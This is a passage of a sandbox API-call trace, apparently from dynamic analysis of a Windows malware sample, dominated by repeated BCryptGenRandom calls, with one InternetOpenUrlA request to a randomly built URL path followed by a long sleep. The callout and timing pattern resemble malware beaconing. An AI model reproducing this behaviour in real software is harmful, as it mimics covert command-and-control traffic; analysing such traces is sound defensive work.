(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a174ad, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a174ad) returned 0x0 [0241.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0241.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.475] GetProcessHeap () returned 0x440000 [0241.475] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0241.475] lstrcpyA (in: lpString1=0x473560, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0241.475] lstrcatA (in: lpString1="\x81\x03", lpString2="/gij8bt8o4UuedlrdLsmI7qe/aXlpoj9jbm9Unx78j80/69z8a4tiQe8S9mecd3ol67t8e1d2ue4ry1ygfw94Hexeynr/" | out: lpString1="\x81\x03/gij8bt8o4UuedlrdLsmI7qe/aXlpoj9jbm9Unx78j80/69z8a4tiQe8S9mecd3ol67t8e1d2ue4ry1ygfw94Hexeynr/") returned="\x81\x03/gij8bt8o4UuedlrdLsmI7qe/aXlpoj9jbm9Unx78j80/69z8a4tiQe8S9mecd3ol67t8e1d2ue4ry1ygfw94Hexeynr/" [0241.476] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0241.476] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/gij8bt8o4UuedlrdLsmI7qe/aXlpoj9jbm9Unx78j80/69z8a4tiQe8S9mecd3ol67t8e1d2ue4ry1ygfw94Hexeynr/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0241.476] GetProcessHeap () returned 0x440000 [0241.476] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0241.476] GetProcessHeap () returned 0x440000 [0241.476] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17480 | out: hHeap=0x440000) returned 1 [0241.476] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0241.476] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0241.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0241.477] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0241.477] Sleep (dwMilliseconds=0x19069) [0241.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0241.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.778] GetProcessHeap () returned 0x440000 [0241.778] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4c40 [0241.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c41, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d4c41) returned 0x0 [0241.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c5c, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d4c5c) returned 0x0 [0241.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 